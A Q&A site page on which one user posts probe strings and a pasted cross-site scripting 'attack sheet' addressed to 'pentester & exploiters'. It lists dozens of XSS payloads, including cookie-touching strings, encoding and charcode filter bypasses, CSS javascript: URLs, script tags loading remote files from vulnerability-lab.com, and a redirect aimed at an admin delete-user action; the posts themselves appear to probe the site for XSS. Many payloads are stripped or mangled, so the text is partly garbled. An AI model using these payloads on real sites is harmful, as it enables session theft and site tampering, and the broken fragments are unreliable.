Share

Question

''>/>'::'":>>?/.>>''>?/>?./?.>>?>''''';;;;'"""/poop

Answer 1

bobdole February 16, 2014

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

Reply Report

Answer 2

bobdole February 16, 2014

Reply Report

Answer 3

bobdole February 16, 2014

Information:
A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have
some good results you can use the following list with automatic scripts, software or for manually pentesting. This
list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon.

Note: This is a technical attack sheet for cross site penetrationtests.

Cross Site Scripting Strings with TAG:

document.cookie=true;

document.cookie=true;//<
document.cookie=true;

li {list-style-image: url("javascript:document.cookie=true;");

CrossSiteScripting
¼script¾document.cookie=true;¼/script¾

@im\port'\ja\vasc\ript:document.cookie=true';

exp/*
document.cookie=true;
.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}
BODY{background:url("javascript:document.cookie=true")}
document.cookie=true;

]]

echo('document.cookie=true'); ?>
+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-

&document.cookie=true;
&{document.cookie=true;};

document.cookie=true;


<document.cookie=true;
document.cookie=true;//-->
document.cookie=true;

document.cookie=true;;
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with close TAG:

>"
>"
>"document.cookie=true;
>"
>"
>"
>"
>"document.cookie=true;//<
>"document.cookie=true;
>"
>"a=/CrossSiteScripting/\ndocument.cookie=true;
>"document.cookie=true;
>"
>"
>"
>"
>"
>"
>"

>"
>"
>"li {list-style-image: url("javascript:document.cookie=true;");
CrossSiteScripting
>"¼script¾document.cookie=true;¼/script¾
>"
>"
>"
>"
>"

>"

>"

>"@im\port'\ja\vasc\ript:document.cookie=true';
>"
>"
>"exp/*
>"document.cookie=true;
>".CrossSiteScripting{background-image:url("javascript:document.cookie=true");}
>"BODY{background:url("javascript:document.cookie=true")}
>"document.cookie=true;
>"
>"
>"]]
>"
>"
>" echo('document.cookie=true'); ?>
>" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"
>"

>"
>"
>"
>"
>"&document.cookie=true;
>"&{document.cookie=true;};
>"
>"
>"
>"
>"
>"
>"

>"

>"

>"

>"document.cookie=true;
>"
>"
>"<document.cookie=true;
>"document.cookie=true;//-->
>"document.cookie=true;
>"
>"
>"
>"document.cookie=true;;
>"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with negative value & TAG:
-1
-1
-1document.cookie=true;
-1
-1
-1
-1
-1document.cookie=true;//<
-1document.cookie=true;
-1
-1
-1
-1
-1
-1
-1
-1

-1
-1
-1li {list-style-image: url("javascript:document.cookie=true;");
CrossSiteScripting
-1¼script¾document.cookie=true;¼/script¾
-1
-1
-1
-1
-1

-1

-1

-1@im\port'\ja\vasc\ript:document.cookie=true';
-1
-1
-1exp/*
-1document.cookie=true;
-1.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}
-1BODY{background:url("javascript:document.cookie=true")}
-1document.cookie=true;
-1
-1
-1]]
-1
-1
-1 echo('document.cookie=true'); ?>
-1 +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1
-1

-1
-1
-1
-1
-1&document.cookie=true;
-1&{document.cookie=true;};
-1
-1
-1
-1
-1
-1
-1

-1

-1

-1

-1document.cookie=true;
-1
-1
-1<document.cookie=true;
-1document.cookie=true;//-->
-1document.cookie=true;
-1
-1
-1
-1 document.cookie=true;;
-1
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings Restriction Bypass Mail:

>"@gmail.com
>"alert(document.cookie)
alert(document.cookie)@gmail.com

@gmail.com
alert(document.cookie)
1337
">
1337+1

Cross Site Scripting Strings Restriction Bypass Obfuscation

>“ALeRt("VlAb")
>"

Cross Site Scripting Strings Restriction Bypass String to Charcode

101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))
'';!--"=&{()}

Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E

Cross Site Scripting Strings via Console:
set vlan name 1337 alert(document.cookie)
set system name
set system location ">set system contact alert('VL')

insert alert(document.cookie)
add
add user alert(document.cookie) alert(document.cookie)@gmail.com

add topic
add name alert('VL')

perl -e 'print "";' > out
perl -e 'print "alert(\"CrossSiteScripting\")";' > out

Cross Site Scripting Strings on per line validation applications:

SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>

Cross Site Scripting Strings Embed:

Cross Site Scripting Strings Action Script:

<alert("CrossSiteScripting");//<
<br><SCRIPT SRC=//vulnerability-lab.com/.js> <br><SCRIPT>a=/CrossSiteScripting/ alert(a.source)

` SRC="http://vulnerability-lab.com/CrossSiteScripting.js">
document.write("<SCRI");PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js">
alert("CrossSiteScripting");

alert("CrossSiteScripting")">

+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';
@import'http://vulnerability-lab.com/CrossSiteScripting.css';
alert('CrossSiteScripting');
.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}
BODY{background:url("javascript:alert('CrossSiteScripting')")}
li {list-style-image: url("javascript:alert('CrossSiteScripting')");}
CrossSiteScripting
BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}

CrossSiteScripting
CrossSiteScripting
CrossSiteScripting
CrossSiteScripting

\";alert('CrossSiteScripting');//

¼script¾alert(¢CrossSiteScripting¢)¼/script¾

exp/*

a="get";
b="URL(\"";
c="javascript:";
d="alert('CrossSiteScripting');\")";
eval(v+l+a+b);

CrossSiteScripting

]]>

">

echo('echo('IPT>alert("CrossSiteScripting")'); ?>

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

<iframe src=http://test.de>

<iframe src=http://test.de>

Reply Report

Answer 4

bobdole February 16, 2014

ipt>

Reply Report

Answer 5

bobdole February 16, 2014

ipt>shit

Reply Report

Answer 6

bobdole February 16, 2014

'as'd';;"//>
ipt> shit

Reply Report

Question

''>/>'::'":>>?/.<?>>

Leave a comment

Looking for something else?

Share

Share your Question

Question

''>/>'::'":>>?/.<?>>

Leave a comment

Looking for something else?

Almost there!